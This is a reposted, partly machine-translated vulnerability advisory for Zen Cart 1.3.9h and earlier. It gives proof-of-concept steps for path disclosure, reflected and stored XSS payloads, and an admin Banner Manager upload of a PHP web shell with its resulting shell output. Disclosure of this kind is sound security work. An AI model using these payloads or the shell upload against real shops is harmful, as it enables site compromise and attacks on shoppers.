Zen Cart & amp; lt; = v1.3.9h multiple defects and repair

Source: Internet
Author: User

[*] ============================================ ================================>
[*]
[*] Multiple Vulnerabilities in Zen Cart
[*]
[*] [Vendor SW] => Zen Cart-http://www.zen-cart.com
[*] [Version] => 1.3.9f, 1.3.9h (but possible all versions)
[*] [Vendor URL] => www.zen-cart.com
[*] [Tested on] => BackTrack 4
[*] [Category] => WebApps/0day
[*]
[*] [Date] => 18 May 2011-(0day from 28 Sep 2010)
[*] [Author] => Dr. Albert to Fontanella
[*] [Author WEB] => ictsec.wordpress.com
[*] [Author E-Mail] => itsicurezza <0x40> yahoo. it
[*]
[*] [Popularity] => intext: "Powered by Zen Cart"
[*] 206.000.000 hits
[*]
[*] <= ====================================
 
 
 
[*] [Full path disclosure]
 
[-] [INFO]
 
An error occurs when an attacker points a single page.
This leads to discover the full path of web server and vhost directory.
 
[-] [EXPLOIT]
 
Http://www.bkjia.com/includes/languages/english.php
... Etc
 
Fatal error: Call to undefined function zen_href_link () in
/Var/www/DES/ages/english. php on line 16
 
 
 
[*] [Reflected cross-site scripting (XSS)]
 
[-] [INFO]
 
This Issue has ** not * been found into last tested version (1.3.9h)
Into all others versions. The "Quantity" field of Store Product dont
Sanitizes user input before to show output back to user. This leads
Attacker to inject and execute arbitrary javascript and/or html code.
 
[-] [EXPLOIT]
 
Http://www.bkjia.com/index.php? Main_page = shopping_cart (OR)
 
Your Shopping Cart Contents =>
 
Qty: "> <script> alert (" XSS ") </script>
 
Click on "Change your Quantity" refresh button.
 
 
 
[*] [Stored cross-site scripting (XSS)]
 
[-] [INFO]
 
You have to be logged as Admin. The "Zones Name & Code" fields
Locations/Taxes dont sanitizes user input before to store it
Database and to show output back to user. This leads an attacker
Inject and execute arbitrary javascript and/or html code.
 
[-] [EXPLOIT]
 
Http://www.bkjia.com/?admin=/zones.php? Page = 1 & action = new (OR)
 
Locations/Taxes => Zones

Zones Name: "> <script> alert (" XSS ") </script>
Zones Code: "> <script> alert (" XSS ") </script>

So, you inject edevil code that can not be deleted. (">) destroy
Page structure so the Admin have to work directly on database
(Phpmyadmin, etc.) to restore it and delete edevil code.
 
... Etc, others Stored XSS are presents on admin console.
 
 
 
[*] [Arbitrary file upload]
 
[-] [INFO]

Banner Manager dont check the extension/type of image to upload.
This leads an attacker that have administrative privileges
Upload arbitrary files on server (ie. backdoors, php shells, etc .)
 
[-] [EXPLOIT]
 
Http://www.bkjia.com/?admin=/banner_manager.php? Action = new (OR)
 
Tools => Banner Manager => New Banner => Image: phpShell. php
 
The uploaded file will be located:
 
Http://www.bkjia.com/images/phpShell.php
 
Uid = 33 (www-data) gid = 33 (www-data) groups = 33 (www-data)
 
 
 
[EOF]
 
Please feel free to write me a bit if you want some information or
A professional consultancy.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.